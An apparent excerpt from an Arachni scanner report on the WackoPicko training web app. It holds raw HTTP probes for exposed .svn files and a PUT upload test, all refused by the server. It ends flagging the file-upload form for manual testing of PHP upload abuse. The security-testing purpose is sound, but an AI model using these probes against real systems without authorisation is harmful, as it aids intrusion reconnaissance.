    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:35 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 197
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:35 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:08 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Form-based File Upload 1 form_upload

The design of many web applications require that users be able to upload files that will either be stored or processed by the receiving web server.

Arachni has flagged this not as a vulnerability, but as a prompt for the penetration tester to conduct further manual testing on the file upload function.

An insecure form-based file upload could allow a cyber-criminal a means to abuse and successfully exploit the server directly, and/or any third party that may later access the file. This can occur through uploading a file containing server side-code (such as PHP) that is then executed when requested by the client.

Remediation guidance

